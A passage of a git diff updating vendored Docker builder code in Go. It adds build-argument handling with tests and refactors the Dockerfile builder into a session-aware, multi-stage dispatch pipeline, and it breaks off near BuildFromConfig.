-	if err = bf.Parse(); err != nil {
-		t.Fatalf("Test %q was supposed to work: %s", bf.Args, err)
-	}
-
-	if flBool1.IsTrue() {
-		t.Fatalf("Test-b3 Bool1 was supposed to be false")
-	}
-
-	// ---
-
-	bf = NewBFlags()
-	flBool1 = bf.AddBool("bool1", false)
-	bf.Args = []string{"--bool1=false1"}
-
-	if err = bf.Parse(); err == nil {
-		t.Fatalf("Test %q was supposed to fail", bf.Args)
-	}
-
-	// ---
-
-	bf = NewBFlags()
-	flBool1 = bf.AddBool("bool1", false)
-	bf.Args = []string{"--bool2"}
-
-	if err = bf.Parse(); err == nil {
-		t.Fatalf("Test %q was supposed to fail", bf.Args)
-	}
-
-	// ---
-
-	bf = NewBFlags()
-	flStr1 = bf.AddString("str1", "HI")
-	flBool1 = bf.AddBool("bool1", false)
-	bf.Args = []string{"--bool1", "--str1=BYE"}
-
-	if err = bf.Parse(); err != nil {
-		t.Fatalf("Test %q was supposed to work: %s", bf.Args, err)
-	}
-
-	if flStr1.Value != "BYE" {
-		t.Fatalf("Teset %s, str1 should be BYE", bf.Args)
-	}
-	if !flBool1.IsTrue() {
-		t.Fatalf("Teset %s, bool1 should be true", bf.Args)
-	}
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/buildargs.go b/vendor/github.com/docker/docker/builder/dockerfile/buildargs.go
new file mode 100644
index 0000000000..f9cceaa05c
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/buildargs.go
@@ -0,0 +1,172 @@
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
+
+import (
+	"fmt"
+	"io"
+
+	"github.com/docker/docker/runconfig/opts"
+)
+
+// builtinAllowedBuildArgs is list of built-in allowed build args
+// these args are considered transparent and are excluded from the image history.
+// Filtering from history is implemented in dispatchers.go
+var builtinAllowedBuildArgs = map[string]bool{
+	"HTTP_PROXY":  true,
+	"http_proxy":  true,
+	"HTTPS_PROXY": true,
+	"https_proxy": true,
+	"FTP_PROXY":   true,
+	"ftp_proxy":   true,
+	"NO_PROXY":    true,
+	"no_proxy":    true,
+}
+
+// BuildArgs manages arguments used by the builder
+type BuildArgs struct {
+	// args that are allowed for expansion/substitution and passing to commands in 'run'.
+	allowedBuildArgs map[string]*string
+	// args defined before the first `FROM` in a Dockerfile
+	allowedMetaArgs map[string]*string
+	// args referenced by the Dockerfile
+	referencedArgs map[string]struct{}
+	// args provided by the user on the command line
+	argsFromOptions map[string]*string
+}
+
+// NewBuildArgs creates a new BuildArgs type
+func NewBuildArgs(argsFromOptions map[string]*string) *BuildArgs {
+	return &BuildArgs{
+		allowedBuildArgs: make(map[string]*string),
+		allowedMetaArgs:  make(map[string]*string),
+		referencedArgs:   make(map[string]struct{}),
+		argsFromOptions:  argsFromOptions,
+	}
+}
+
+// Clone returns a copy of the BuildArgs type
+func (b *BuildArgs) Clone() *BuildArgs {
+	result := NewBuildArgs(b.argsFromOptions)
+	for k, v := range b.allowedBuildArgs {
+		result.allowedBuildArgs[k] = v
+	}
+	for k, v := range b.allowedMetaArgs {
+		result.allowedMetaArgs[k] = v
+	}
+	for k := range b.referencedArgs {
+		result.referencedArgs[k] = struct{}{}
+	}
+	return result
+}
+
+// MergeReferencedArgs merges referenced args from another BuildArgs
+// object into the current one
+func (b *BuildArgs) MergeReferencedArgs(other *BuildArgs) {
+	for k := range other.referencedArgs {
+		b.referencedArgs[k] = struct{}{}
+	}
+}
+
+// WarnOnUnusedBuildArgs checks if there are any leftover build-args that were
+// passed but not consumed during build. Print a warning, if there are any.
+func (b *BuildArgs) WarnOnUnusedBuildArgs(out io.Writer) {
+	var leftoverArgs []string
+	for arg := range b.argsFromOptions {
+		_, isReferenced := b.referencedArgs[arg]
+		_, isBuiltin := builtinAllowedBuildArgs[arg]
+		if !isBuiltin && !isReferenced {
+			leftoverArgs = append(leftoverArgs, arg)
+		}
+	}
+	if len(leftoverArgs) > 0 {
+		fmt.Fprintf(out, "[Warning] One or more build-args %v were not consumed\n", leftoverArgs)
+	}
+}
+
+// ResetAllowed clears the list of args that are allowed to be used by a
+// directive
+func (b *BuildArgs) ResetAllowed() {
+	b.allowedBuildArgs = make(map[string]*string)
+}
+
+// AddMetaArg adds a new meta arg that can be used by FROM directives
+func (b *BuildArgs) AddMetaArg(key string, value *string) {
+	b.allowedMetaArgs[key] = value
+}
+
+// AddArg adds a new arg that can be used by directives
+func (b *BuildArgs) AddArg(key string, value *string) {
+	b.allowedBuildArgs[key] = value
+	b.referencedArgs[key] = struct{}{}
+}
+
+// IsReferencedOrNotBuiltin checks if the key is a built-in arg, or if it has been
+// referenced by the Dockerfile. Returns true if the arg is not a builtin or
+// if the builtin has been referenced in the Dockerfile.
+func (b *BuildArgs) IsReferencedOrNotBuiltin(key string) bool {
+	_, isBuiltin := builtinAllowedBuildArgs[key]
+	_, isAllowed := b.allowedBuildArgs[key]
+	return isAllowed || !isBuiltin
+}
+
+// GetAllAllowed returns a mapping with all the allowed args
+func (b *BuildArgs) GetAllAllowed() map[string]string {
+	return b.getAllFromMapping(b.allowedBuildArgs)
+}
+
+// GetAllMeta returns a mapping with all the meta meta args
+func (b *BuildArgs) GetAllMeta() map[string]string {
+	return b.getAllFromMapping(b.allowedMetaArgs)
+}
+
+func (b *BuildArgs) getAllFromMapping(source map[string]*string) map[string]string {
+	m := make(map[string]string)
+
+	keys := keysFromMaps(source, builtinAllowedBuildArgs)
+	for _, key := range keys {
+		v, ok := b.getBuildArg(key, source)
+		if ok {
+			m[key] = v
+		}
+	}
+	return m
+}
+
+// FilterAllowed returns all allowed args without the filtered args
+func (b *BuildArgs) FilterAllowed(filter []string) []string {
+	envs := []string{}
+	configEnv := opts.ConvertKVStringsToMap(filter)
+
+	for key, val := range b.GetAllAllowed() {
+		if _, ok := configEnv[key]; !ok {
+			envs = append(envs, fmt.Sprintf("%s=%s", key, val))
+		}
+	}
+	return envs
+}
+
+func (b *BuildArgs) getBuildArg(key string, mapping map[string]*string) (string, bool) {
+	defaultValue, exists := mapping[key]
+	// Return override from options if one is defined
+	if v, ok := b.argsFromOptions[key]; ok && v != nil {
+		return *v, ok
+	}
+
+	if defaultValue == nil {
+		if v, ok := b.allowedMetaArgs[key]; ok && v != nil {
+			return *v, ok
+		}
+		return "", false
+	}
+	return *defaultValue, exists
+}
+
+func keysFromMaps(source map[string]*string, builtin map[string]bool) []string {
+	keys := []string{}
+	for key := range source {
+		keys = append(keys, key)
+	}
+	for key := range builtin {
+		keys = append(keys, key)
+	}
+	return keys
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/buildargs_test.go b/vendor/github.com/docker/docker/builder/dockerfile/buildargs_test.go
new file mode 100644
index 0000000000..c3b82c83f4
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/buildargs_test.go
@@ -0,0 +1,102 @@
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
+
+import (
+	"bytes"
+	"strings"
+	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func strPtr(source string) *string {
+	return &source
+}
+
+func TestGetAllAllowed(t *testing.T) {
+	buildArgs := NewBuildArgs(map[string]*string{
+		"ArgNotUsedInDockerfile":              strPtr("fromopt1"),
+		"ArgOverriddenByOptions":              strPtr("fromopt2"),
+		"ArgNoDefaultInDockerfileFromOptions": strPtr("fromopt3"),
+		"HTTP_PROXY":                          strPtr("theproxy"),
+	})
+
+	buildArgs.AddMetaArg("ArgFromMeta", strPtr("frommeta1"))
+	buildArgs.AddMetaArg("ArgFromMetaOverridden", strPtr("frommeta2"))
+	buildArgs.AddMetaArg("ArgFromMetaNotUsed", strPtr("frommeta3"))
+
+	buildArgs.AddArg("ArgOverriddenByOptions", strPtr("fromdockerfile2"))
+	buildArgs.AddArg("ArgWithDefaultInDockerfile", strPtr("fromdockerfile1"))
+	buildArgs.AddArg("ArgNoDefaultInDockerfile", nil)
+	buildArgs.AddArg("ArgNoDefaultInDockerfileFromOptions", nil)
+	buildArgs.AddArg("ArgFromMeta", nil)
+	buildArgs.AddArg("ArgFromMetaOverridden", strPtr("fromdockerfile3"))
+
+	all := buildArgs.GetAllAllowed()
+	expected := map[string]string{
+		"HTTP_PROXY":                          "theproxy",
+		"ArgOverriddenByOptions":              "fromopt2",
+		"ArgWithDefaultInDockerfile":          "fromdockerfile1",
+		"ArgNoDefaultInDockerfileFromOptions": "fromopt3",
+		"ArgFromMeta":                         "frommeta1",
+		"ArgFromMetaOverridden":               "fromdockerfile3",
+	}
+	assert.Check(t, is.DeepEqual(expected, all))
+}
+
+func TestGetAllMeta(t *testing.T) {
+	buildArgs := NewBuildArgs(map[string]*string{
+		"ArgNotUsedInDockerfile":        strPtr("fromopt1"),
+		"ArgOverriddenByOptions":        strPtr("fromopt2"),
+		"ArgNoDefaultInMetaFromOptions": strPtr("fromopt3"),
+		"HTTP_PROXY":                    strPtr("theproxy"),
+	})
+
+	buildArgs.AddMetaArg("ArgFromMeta", strPtr("frommeta1"))
+	buildArgs.AddMetaArg("ArgOverriddenByOptions", strPtr("frommeta2"))
+	buildArgs.AddMetaArg("ArgNoDefaultInMetaFromOptions", nil)
+
+	all := buildArgs.GetAllMeta()
+	expected := map[string]string{
+		"HTTP_PROXY":                    "theproxy",
+		"ArgFromMeta":                   "frommeta1",
+		"ArgOverriddenByOptions":        "fromopt2",
+		"ArgNoDefaultInMetaFromOptions": "fromopt3",
+	}
+	assert.Check(t, is.DeepEqual(expected, all))
+}
+
+func TestWarnOnUnusedBuildArgs(t *testing.T) {
+	buildArgs := NewBuildArgs(map[string]*string{
+		"ThisArgIsUsed":    strPtr("fromopt1"),
+		"ThisArgIsNotUsed": strPtr("fromopt2"),
+		"HTTPS_PROXY":      strPtr("referenced builtin"),
+		"HTTP_PROXY":       strPtr("unreferenced builtin"),
+	})
+	buildArgs.AddArg("ThisArgIsUsed", nil)
+	buildArgs.AddArg("HTTPS_PROXY", nil)
+
+	buffer := new(bytes.Buffer)
+	buildArgs.WarnOnUnusedBuildArgs(buffer)
+	out := buffer.String()
+	assert.Assert(t, !strings.Contains(out, "ThisArgIsUsed"), out)
+	assert.Assert(t, !strings.Contains(out, "HTTPS_PROXY"), out)
+	assert.Assert(t, !strings.Contains(out, "HTTP_PROXY"), out)
+	assert.Check(t, is.Contains(out, "ThisArgIsNotUsed"))
+}
+
+func TestIsUnreferencedBuiltin(t *testing.T) {
+	buildArgs := NewBuildArgs(map[string]*string{
+		"ThisArgIsUsed":    strPtr("fromopt1"),
+		"ThisArgIsNotUsed": strPtr("fromopt2"),
+		"HTTPS_PROXY":      strPtr("referenced builtin"),
+		"HTTP_PROXY":       strPtr("unreferenced builtin"),
+	})
+	buildArgs.AddArg("ThisArgIsUsed", nil)
+	buildArgs.AddArg("HTTPS_PROXY", nil)
+
+	assert.Check(t, buildArgs.IsReferencedOrNotBuiltin("ThisArgIsUsed"))
+	assert.Check(t, buildArgs.IsReferencedOrNotBuiltin("ThisArgIsNotUsed"))
+	assert.Check(t, buildArgs.IsReferencedOrNotBuiltin("HTTPS_PROXY"))
+	assert.Check(t, !buildArgs.IsReferencedOrNotBuiltin("HTTP_PROXY"))
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/builder.go b/vendor/github.com/docker/docker/builder/dockerfile/builder.go
index da43513fff..d5d2de8180 100644
--- a/vendor/github.com/docker/docker/builder/dockerfile/builder.go
+++ b/vendor/github.com/docker/docker/builder/dockerfile/builder.go
@@ -1,26 +1,33 @@
-package dockerfile
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
 
 import (
 	"bytes"
-	"errors"
+	"context"
 	"fmt"
 	"io"
 	"io/ioutil"
-	"os"
+	"sort"
 	"strings"
+	"time"
 
-	"github.com/Sirupsen/logrus"
-	apierrors "github.com/docker/docker/api/errors"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/backend"
 	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/builder"
-	"github.com/docker/docker/builder/dockerfile/parser"
-	"github.com/docker/docker/image"
+	"github.com/docker/docker/builder/fscache"
+	"github.com/docker/docker/builder/remotecontext"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/streamformatter"
 	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/reference"
-	perrors "github.com/pkg/errors"
-	"golang.org/x/net/context"
+	"github.com/docker/docker/pkg/system"
+	"github.com/moby/buildkit/frontend/dockerfile/instructions"
+	"github.com/moby/buildkit/frontend/dockerfile/parser"
+	"github.com/moby/buildkit/frontend/dockerfile/shell"
+	"github.com/moby/buildkit/session"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sync/syncmap"
 )
 
 var validCommitCommands = map[string]bool{
@@ -36,289 +43,311 @@ var validCommitCommands = map[string]bool{
 	"workdir":     true,
 }
 
-// BuiltinAllowedBuildArgs is list of built-in allowed build args
-var BuiltinAllowedBuildArgs = map[string]bool{
-	"HTTP_PROXY":  true,
-	"http_proxy":  true,
-	"HTTPS_PROXY": true,
-	"https_proxy": true,
-	"FTP_PROXY":   true,
-	"ftp_proxy":   true,
-	"NO_PROXY":    true,
-	"no_proxy":    true,
-}
-
-// Builder is a Dockerfile builder
-// It implements the builder.Backend interface.
-type Builder struct {
-	options *types.ImageBuildOptions
-
-	Stdout io.Writer
-	Stderr io.Writer
-	Output io.Writer
-
-	docker    builder.Backend
-	context   builder.Context
-	clientCtx context.Context
-	cancel    context.CancelFunc
-
-	dockerfile       *parser.Node
-	runConfig        *container.Config // runconfig for cmd, run, entrypoint etc.
-	flags            *BFlags
-	tmpContainers    map[string]struct{}
-	image            string // imageID
-	noBaseImage      bool
-	maintainer       string
-	cmdSet           bool
-	disableCommit    bool
-	cacheBusted      bool
-	allowedBuildArgs map[string]bool // list of build-time args that are allowed for expansion/substitution and passing to commands in 'run'.
-	directive        parser.Directive
-
-	// TODO: remove once docker.Commit can receive a tag
-	id string
+const (
+	stepFormat = "Step %d/%d : %v"
+)
 
-	imageCache builder.ImageCache
-	from       builder.Image
+// SessionGetter is object used to get access to a session by uuid
+type SessionGetter interface {
+	Get(ctx context.Context, uuid string) (session.Caller, error)
 }
 
-// BuildManager implements builder.Backend and is shared across all Builder objects.
+// BuildManager is shared across all Builder objects
 type BuildManager struct {
-	backend builder.Backend
+	idMappings *idtools.IDMappings
+	backend    builder.Backend
+	pathCache  pathCache // TODO: make this persistent
+	sg         SessionGetter
+	fsCache    *fscache.FSCache
 }
 
-// NewBuildManager creates a BuildManager.
-func NewBuildManager(b builder.Backend) (bm *BuildManager) {
-	return &BuildManager{backend: b}
+// NewBuildManager creates a BuildManager
+func NewBuildManager(b builder.Backend, sg SessionGetter, fsCache *fscache.FSCache, idMappings *idtools.IDMappings) (*BuildManager, error) {
+	bm := &BuildManager{
+		backend:    b,
+		pathCache:  &syncmap.Map{},
+		sg:         sg,
+		idMappings: idMappings,
+		fsCache:    fsCache,
+	}
+	if err := fsCache.RegisterTransport(remotecontext.ClientSessionRemote, NewClientSessionTransport()); err != nil {
+		return nil, err
+	}
+	return bm, nil
 }
 
-// BuildFromContext builds a new image from a given context.
-func (bm *BuildManager) BuildFromContext(ctx context.Context, src io.ReadCloser, remote string, buildOptions *types.ImageBuildOptions, pg backend.ProgressWriter) (string, error) {
-	if buildOptions.Squash && !bm.backend.HasExperimental() {
-		return "", apierrors.NewBadRequestError(errors.New("squash is only supported with experimental mode"))
+// Build starts a new build from a BuildConfig
+func (bm *BuildManager) Build(ctx context.Context, config backend.BuildConfig) (*builder.Result, error) {
+	buildsTriggered.Inc()
+	if config.Options.Dockerfile == "" {
+		config.Options.Dockerfile = builder.DefaultDockerfileName
 	}
-	buildContext, dockerfileName, err := builder.DetectContextFromRemoteURL(src, remote, pg.ProgressReaderFunc)
+
+	source, dockerfile, err := remotecontext.Detect(config)
 	if err != nil {
-		return "", err
+		return nil, err
 	}
 	defer func() {
-		if err := buildContext.Close(); err != nil {
-			logrus.Debugf("[BUILDER] failed to remove temporary context: %v", err)
+		if source != nil {
+			if err := source.Close(); err != nil {
+				logrus.Debugf("[BUILDER] failed to remove temporary context: %v", err)
+			}
 		}
 	}()
 
-	if len(dockerfileName) > 0 {
-		buildOptions.Dockerfile = dockerfileName
-	}
-	b, err := NewBuilder(ctx, buildOptions, bm.backend, builder.DockerIgnoreContext{ModifiableContext: buildContext}, nil)
-	if err != nil {
-		return "", err
-	}
-	return b.build(pg.StdoutFormatter, pg.StderrFormatter, pg.Output)
-}
+	ctx, cancel := context.WithCancel(ctx)
+	defer cancel()
 
-// NewBuilder creates a new Dockerfile builder from an optional dockerfile and a Config.
-// If dockerfile is nil, the Dockerfile specified by Config.DockerfileName,
-// will be read from the Context passed to Build().
-func NewBuilder(clientCtx context.Context, config *types.ImageBuildOptions, backend builder.Backend, buildContext builder.Context, dockerfile io.ReadCloser) (b *Builder, err error) {
-	if config == nil {
-		config = new(types.ImageBuildOptions)
+	if src, err := bm.initializeClientSession(ctx, cancel, config.Options); err != nil {
+		return nil, err
+	} else if src != nil {
+		source = src
 	}
-	if config.BuildArgs == nil {
-		config.BuildArgs = make(map[string]*string)
+
+	os := ""
+	apiPlatform := system.ParsePlatform(config.Options.Platform)
+	if apiPlatform.OS != "" {
+		os = apiPlatform.OS
 	}
-	ctx, cancel := context.WithCancel(clientCtx)
-	b = &Builder{
-		clientCtx:        ctx,
-		cancel:           cancel,
-		options:          config,
-		Stdout:           os.Stdout,
-		Stderr:           os.Stderr,
-		docker:           backend,
-		context:          buildContext,
-		runConfig:        new(container.Config),
-		tmpContainers:    map[string]struct{}{},
-		id:               stringid.GenerateNonCryptoID(),
-		allowedBuildArgs: make(map[string]bool),
-		directive: parser.Directive{
-			EscapeSeen:           false,
-			LookingForDirectives: true,
-		},
+	config.Options.Platform = os
+
+	builderOptions := builderOptions{
+		Options:        config.Options,
+		ProgressWriter: config.ProgressWriter,
+		Backend:        bm.backend,
+		PathCache:      bm.pathCache,
+		IDMappings:     bm.idMappings,
 	}
-	if icb, ok := backend.(builder.ImageCacheBuilder); ok {
-		b.imageCache = icb.MakeImageCache(config.CacheFrom)
+	return newBuilder(ctx, builderOptions).build(source, dockerfile)
+}
+
+func (bm *BuildManager) initializeClientSession(ctx context.Context, cancel func(), options *types.ImageBuildOptions) (builder.Source, error) {
+	if options.SessionID == "" || bm.sg == nil {
+		return nil, nil
 	}
+	logrus.Debug("client is session enabled")
 
-	parser.SetEscapeToken(parser.DefaultEscapeToken, &b.directive) // Assume the default token for escape
+	connectCtx, cancelCtx := context.WithTimeout(ctx, sessionConnectTimeout)
+	defer cancelCtx()
 
-	if dockerfile != nil {
-		b.dockerfile, err = parser.Parse(dockerfile, &b.directive)
+	c, err := bm.sg.Get(connectCtx, options.SessionID)
+	if err != nil {
+		return nil, err
+	}
+	go func() {
+		<-c.Context().Done()
+		cancel()
+	}()
+	if options.RemoteContext == remotecontext.ClientSessionRemote {
+		st := time.Now()
+		csi, err := NewClientSessionSourceIdentifier(ctx, bm.sg, options.SessionID)
+		if err != nil {
+			return nil, err
+		}
+		src, err := bm.fsCache.SyncFrom(ctx, csi)
 		if err != nil {
 			return nil, err
 		}
+		logrus.Debugf("sync-time: %v", time.Since(st))
+		return src, nil
 	}
-
-	return b, nil
+	return nil, nil
 }
 
-// sanitizeRepoAndTags parses the raw "t" parameter received from the client
-// to a slice of repoAndTag.
-// It also validates each repoName and tag.
-func sanitizeRepoAndTags(names []string) ([]reference.Named, error) {
-	var (
-		repoAndTags []reference.Named
-		// This map is used for deduplicating the "-t" parameter.
-		uniqNames = make(map[string]struct{})
-	)
-	for _, repo := range names {
-		if repo == "" {
-			continue
-		}
+// builderOptions are the dependencies required by the builder
+type builderOptions struct {
+	Options        *types.ImageBuildOptions
+	Backend        builder.Backend
+	ProgressWriter backend.ProgressWriter
+	PathCache      pathCache
+	IDMappings     *idtools.IDMappings
+}
 
-		ref, err := reference.ParseNamed(repo)
-		if err != nil {
-			return nil, err
-		}
+// Builder is a Dockerfile builder
+// It implements the builder.Backend interface.
+type Builder struct {
+	options *types.ImageBuildOptions
 
-		ref = reference.WithDefaultTag(ref)
+	Stdout io.Writer
+	Stderr io.Writer
+	Aux    *streamformatter.AuxFormatter
+	Output io.Writer
 
-		if _, isCanonical := ref.(reference.Canonical); isCanonical {
-			return nil, errors.New("build tag cannot contain a digest")
-		}
+	docker    builder.Backend
+	clientCtx context.Context
 
-		if _, isTagged := ref.(reference.NamedTagged); !isTagged {
-			ref, err = reference.WithTag(ref, reference.DefaultTag)
-			if err != nil {
-				return nil, err
-			}
-		}
+	idMappings       *idtools.IDMappings
+	disableCommit    bool
+	imageSources     *imageSources
+	pathCache        pathCache
+	containerManager *containerManager
+	imageProber      ImageProber
+}
 
-		nameWithTag := ref.String()
+// newBuilder creates a new Dockerfile builder from an optional dockerfile and a Options.
+func newBuilder(clientCtx context.Context, options builderOptions) *Builder {
+	config := options.Options
+	if config == nil {
+		config = new(types.ImageBuildOptions)
+	}
 
-		if _, exists := uniqNames[nameWithTag]; !exists {
-			uniqNames[nameWithTag] = struct{}{}
-			repoAndTags = append(repoAndTags, ref)
-		}
+	b := &Builder{
+		clientCtx:        clientCtx,
+		options:          config,
+		Stdout:           options.ProgressWriter.StdoutFormatter,
+		Stderr:           options.ProgressWriter.StderrFormatter,
+		Aux:              options.ProgressWriter.AuxFormatter,
+		Output:           options.ProgressWriter.Output,
+		docker:           options.Backend,
+		idMappings:       options.IDMappings,
+		imageSources:     newImageSources(clientCtx, options),
+		pathCache:        options.PathCache,
+		imageProber:      newImageProber(options.Backend, config.CacheFrom, config.NoCache),
+		containerManager: newContainerManager(options.Backend),
 	}
-	return repoAndTags, nil
+
+	return b
 }
 
-// build runs the Dockerfile builder from a context and a docker object that allows to make calls
-// to Docker.
-//
-// This will (barring errors):
-//
-// * read the dockerfile from context
-// * parse the dockerfile if not already parsed
-// * walk the AST and execute it by dispatching to handlers. If Remove
-//   or ForceRemove is set, additional cleanup around containers happens after
-//   processing.
-// * Tag image, if applicable.
-// * Print a happy message and return the image ID.
-//
-func (b *Builder) build(stdout io.Writer, stderr io.Writer, out io.Writer) (string, error) {
-	b.Stdout = stdout
-	b.Stderr = stderr
-	b.Output = out
-
-	// If Dockerfile was not parsed yet, extract it from the Context
-	if b.dockerfile == nil {
-		if err := b.readDockerfile(); err != nil {
-			return "", err
-		}
+// Build 'LABEL' command(s) from '--label' options and add to the last stage
+func buildLabelOptions(labels map[string]string, stages []instructions.Stage) {
+	keys := []string{}
+	for key := range labels {
+		keys = append(keys, key)
 	}
 
-	repoAndTags, err := sanitizeRepoAndTags(b.options.Tags)
-	if err != nil {
-		return "", err
+	// Sort the label to have a repeatable order
+	sort.Strings(keys)
+	for _, key := range keys {
+		value := labels[key]
+		stages[len(stages)-1].AddCommand(instructions.NewLabelCommand(key, value, true))
 	}
+}
 
-	if len(b.options.Labels) > 0 {
-		line := "LABEL "
-		for k, v := range b.options.Labels {
-			line += fmt.Sprintf("%q='%s' ", k, v)
-		}
-		_, node, err := parser.ParseLine(line, &b.directive, false)
-		if err != nil {
-			return "", err
-		}
-		b.dockerfile.Children = append(b.dockerfile.Children, node)
-	}
+// Build runs the Dockerfile builder by parsing the Dockerfile and executing
+// the instructions from the file.
+func (b *Builder) build(source builder.Source, dockerfile *parser.Result) (*builder.Result, error) {
+	defer b.imageSources.Unmount()
 
-	var shortImgID string
-	total := len(b.dockerfile.Children)
-	for _, n := range b.dockerfile.Children {
-		if err := b.checkDispatch(n, false); err != nil {
-			return "", err
+	stages, metaArgs, err := instructions.Parse(dockerfile.AST)
+	if err != nil {
+		if instructions.IsUnknownInstruction(err) {
+			buildsFailed.WithValues(metricsUnknownInstructionError).Inc()
 		}
+		return nil, errdefs.InvalidParameter(err)
 	}
-
-	for i, n := range b.dockerfile.Children {
-		select {
-		case <-b.clientCtx.Done():
-			logrus.Debug("Builder: build cancelled!")
-			fmt.Fprintf(b.Stdout, "Build cancelled")
-			return "", fmt.Errorf("Build cancelled")
-		default:
-			// Not cancelled yet, keep going...
+	if b.options.Target != "" {
+		targetIx, found := instructions.HasStage(stages, b.options.Target)
+		if !found {
+			buildsFailed.WithValues(metricsBuildTargetNotReachableError).Inc()
+			return nil, errdefs.InvalidParameter(errors.Errorf("failed to reach build target %s in Dockerfile", b.options.Target))
 		}
+		stages = stages[:targetIx+1]
+	}
 
-		if err := b.dispatch(i, total, n); err != nil {
-			if b.options.ForceRemove {
-				b.clearTmp()
-			}
-			return "", err
-		}
+	// Add 'LABEL' command specified by '--label' option to the last stage
+	buildLabelOptions(b.options.Labels, stages)
 
-		shortImgID = stringid.TruncateID(b.image)
-		fmt.Fprintf(b.Stdout, " ---> %s\n", shortImgID)
-		if b.options.Remove {
-			b.clearTmp()
-		}
+	dockerfile.PrintWarnings(b.Stderr)
+	dispatchState, err := b.dispatchDockerfileWithCancellation(stages, metaArgs, dockerfile.EscapeToken, source)
+	if err != nil {
+		return nil, err
+	}
+	if dispatchState.imageID == "" {
+		buildsFailed.WithValues(metricsDockerfileEmptyError).Inc()
+		return nil, errors.New("No image was generated. Is your Dockerfile empty?")
 	}
+	return &builder.Result{ImageID: dispatchState.imageID, FromImage: dispatchState.baseImage}, nil
+}
 
-	// check if there are any leftover build-args that were passed but not
-	// consumed during build. Return a warning, if there are any.
-	leftoverArgs := []string{}
-	for arg := range b.options.BuildArgs {
-		if !b.isBuildArgAllowed(arg) {
-			leftoverArgs = append(leftoverArgs, arg)
-		}
+func emitImageID(aux *streamformatter.AuxFormatter, state *dispatchState) error {
+	if aux == nil || state.imageID == "" {
+		return nil
 	}
+	return aux.Emit(types.BuildResult{ID: state.imageID})
+}
 
-	if len(leftoverArgs) > 0 {
-		fmt.Fprintf(b.Stderr, "[Warning] One or more build-args %v were not consumed\n", leftoverArgs)
+func processMetaArg(meta instructions.ArgCommand, shlex *shell.Lex, args *BuildArgs) error {
+	// shell.Lex currently only support the concatenated string format
+	envs := convertMapToEnvList(args.GetAllAllowed())
+	if err := meta.Expand(func(word string) (string, error) {
+		return shlex.ProcessWord(word, envs)
+	}); err != nil {
+		return err
 	}
+	args.AddArg(meta.Key, meta.Value)
+	args.AddMetaArg(meta.Key, meta.Value)
+	return nil
+}
 
-	if b.image == "" {
-		return "", fmt.Errorf("No image was generated. Is your Dockerfile empty?")
+func printCommand(out io.Writer, currentCommandIndex int, totalCommands int, cmd interface{}) int {
+	fmt.Fprintf(out, stepFormat, currentCommandIndex, totalCommands, cmd)
+	fmt.Fprintln(out)
+	return currentCommandIndex + 1
+}
+
+func (b *Builder) dispatchDockerfileWithCancellation(parseResult []instructions.Stage, metaArgs []instructions.ArgCommand, escapeToken rune, source builder.Source) (*dispatchState, error) {
+	dispatchRequest := dispatchRequest{}
+	buildArgs := NewBuildArgs(b.options.BuildArgs)
+	totalCommands := len(metaArgs) + len(parseResult)
+	currentCommandIndex := 1
+	for _, stage := range parseResult {
+		totalCommands += len(stage.Commands)
 	}
+	shlex := shell.NewLex(escapeToken)
+	for _, meta := range metaArgs {
+		currentCommandIndex = printCommand(b.Stdout, currentCommandIndex, totalCommands, &meta)
 
-	if b.options.Squash {
-		var fromID string
-		if b.from != nil {
-			fromID = b.from.ImageID()
-		}
-		b.image, err = b.docker.SquashImage(b.image, fromID)
+		err := processMetaArg(meta, shlex, buildArgs)
 		if err != nil {
-			return "", perrors.Wrap(err, "error squashing image")
+			return nil, err
 		}
 	}
 
-	imageID := image.ID(b.image)
-	for _, rt := range repoAndTags {
-		if err := b.docker.TagImageWithReference(imageID, rt); err != nil {
-			return "", err
+	stagesResults := newStagesBuildResults()
+
+	for _, stage := range parseResult {
+		if err := stagesResults.checkStageNameAvailable(stage.Name); err != nil {
+			return nil, err
 		}
-	}
+		dispatchRequest = newDispatchRequest(b, escapeToken, source, buildArgs, stagesResults)
 
-	fmt.Fprintf(b.Stdout, "Successfully built %s\n", shortImgID)
-	return b.image, nil
-}
+		currentCommandIndex = printCommand(b.Stdout, currentCommandIndex, totalCommands, stage.SourceCode)
+		if err := initializeStage(dispatchRequest, &stage); err != nil {
+			return nil, err
+		}
+		dispatchRequest.state.updateRunConfig()
+		fmt.Fprintf(b.Stdout, " ---> %s\n", stringid.TruncateID(dispatchRequest.state.imageID))
+		for _, cmd := range stage.Commands {
+			select {
+			case <-b.clientCtx.Done():
+				logrus.Debug("Builder: build cancelled!")
+				fmt.Fprint(b.Stdout, "Build cancelled\n")
+				buildsFailed.WithValues(metricsBuildCanceled).Inc()
+				return nil, errors.New("Build cancelled")
+			default:
+				// Not cancelled yet, keep going...
+			}
 
-// Cancel cancels an ongoing Dockerfile build.
-func (b *Builder) Cancel() {
-	b.cancel()
+			currentCommandIndex = printCommand(b.Stdout, currentCommandIndex, totalCommands, cmd)
+
+			if err := dispatch(dispatchRequest, cmd); err != nil {
+				return nil, err
+			}
+			dispatchRequest.state.updateRunConfig()
+			fmt.Fprintf(b.Stdout, " ---> %s\n", stringid.TruncateID(dispatchRequest.state.imageID))
+
+		}
+		if err := emitImageID(b.Aux, dispatchRequest.state); err != nil {
+			return nil, err
+		}
+		buildArgs.MergeReferencedArgs(dispatchRequest.state.buildArgs)
+		if err := commitStage(dispatchRequest.state, stagesResults); err != nil {
+			return nil, err
+		}
+	}
+	buildArgs.WarnOnUnusedBuildArgs(b.Stdout)
+	return dispatchRequest.state, nil
 }
 
 // BuildFromConfig builds directly from `changes`, treating it as if it were the contents of a Dockerfile
@@ -330,41 +359,63 @@ func (b *Builder) Cancel() {
 // coming from the query parameter of the same name.
 //
 // TODO: Remove?
